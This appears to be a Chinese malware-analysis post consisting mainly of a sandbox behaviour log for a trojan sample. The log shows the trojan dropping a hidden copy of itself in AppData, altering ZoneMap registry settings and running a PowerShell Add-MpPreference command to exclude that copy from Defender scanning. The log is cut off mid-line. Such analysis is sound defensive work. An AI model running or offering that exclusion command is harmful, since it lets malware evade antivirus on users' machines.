木马分析 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292
看下行为:
09:32:34:044, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_create, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:5192 cmdline:'C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe' image_base:0x0000000000FD0000 image_size:0x0008A000 , 0x00000000 [操作成功完成。 ], 09:32:34:093, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\Microsoft.NET\Framework, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:107, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:107, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll, base:0x000000006A3B0000 size:0x0140E000 , 0x00000000 [操作成功完成。 ], 09:32:34:138, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:138, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:201, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:216, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll, base:0x0000000069950000 size:0x00A55000 , 0x00000000 [操作成功完成。 ], 09:32:34:248, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:248, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:373, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:373, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:404, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll, base:0x0000000069130000 size:0x00818000 , 0x00000000 [操作成功完成。 ], 09:32:34:420, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll, base:0x0000000073EC0000 size:0x00106000 , 0x00000000 [操作成功完成。 ], 09:32:34:451, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll, base:0x00000000689B0000 size:0x00774000 , 0x00000000 [操作成功完成。 ], 09:32:34:576, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll, base:0x0000000073D50000 size:0x0008E000 , 0x00000000 [操作成功完成。 ], 09:32:34:669, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:669, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:716, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll, base:0x000000006C7D0000 size:0x0016F000 , 0x00000000 [操作成功完成。 ], 09:33:16:413, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:413, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:413, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:452, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_touch, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, access:0x0017019F alloc_size:537088 attrib:0x00000020 share_access:0x00000000 disposition:0x00000002 options:0x00000044 , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_truncate, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, eof:0x00083200 , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_write, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, offset:0x00000000 datalen:0x00040000 , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_chmod, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_chmod, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, attrib:0x00002087 , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, BA_extract_hidden, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, , 0x00000000 [操作成功完成。 ], 09:33:16:482, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_setsec, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, , 0x00000000 [操作成功完成。 ], 09:33:16:482, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:498, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:513, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll, base:0x0000000068650000 size:0x00357000 , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:603, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, target_pid:5080 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:0, 2928, EXEC_create, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' image_base:0x0000000001150000 image_size:0x0006C000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\System32\ntdll.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\System32\wow64win.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\System32\kernel32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\System32\user32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\System32\wow64.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\System32\wow64cpu.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\ntdll.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\KernelBase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\System32\locale.nls, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\System32\conhost.exe, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\msvcrt.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\oleaut32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\msvcp_win.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\combase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\rpcrt4.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\sspicli.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\cryptbase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\bcryptprimitives.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\sechost.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\advapi32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_truncate, C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp, eof:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\kernel32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\gdi32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\gdi32full.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\user32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\win32u.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\ucrtbase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\atl.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\mscoree.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\imm32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\WindowsPowerShell\v1.0\zh-CN\powershell.exe.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp, offset:0x00000000 datalen:0x00000646 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\SysWOW64\shlwapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp, , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\SysWOW64\kernel.appcore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\SysWOW64\version.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\Globalization\Sorting\SortDefault.nls, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\ole32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\psapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\WinSxS\x86_netfx4-mscoreei_dll_b03f5f7f11d50a3a_4.0.15744.551_none_73fe24de2a51a8fe\mscoreei.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\bcrypt.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5744, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\WinSxS\x86_netfx4-vcruntime140_clr_dll_31bf3856ad364e35_4.0.15744.161_none_dfd2b7ab83adb539\vcruntime140_clr0400.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\System32\C_1252.NLS, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\rsaenh.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:252, 2928, FILE_chmod, C:\Windows\SysWOW64\clbcatq.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\WinSxS\x86_netfx4-ucrtbase_clr_dll_b03f5f7f11d50a3a_4.0.15744.161_none_2a27da64743bf3cb\ucrtbase_clr0400.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\winnlsres.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\winnlsres.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\shell32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\cfgmgr32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\zh-Hans\mscorrc.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\SHCore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\windows.storage.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\profapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\powrprof.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\wintrust.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\msasn1.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:252, 2928, FILE_chmod, C:\Windows\SysWOW64\crypt32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5744, 2928, FILE_chmod, C:\Windows\SysWOW64\cryptsp.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\amsi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\wldp.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:252, 2928, FILE_chmod, C:\Windows\SysWOW64\userenv.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\tzres.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\tzres.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\System32\zh-CN\tzres.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\WinSxS\x86_system.data_b77a5c561934e089_4.0.15744.161_none_2c1622a959db26c0\System.Data.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\ws2_32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5740, 2928, FILE_chmod, C:\Windows\SysWOW64\gpapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Program 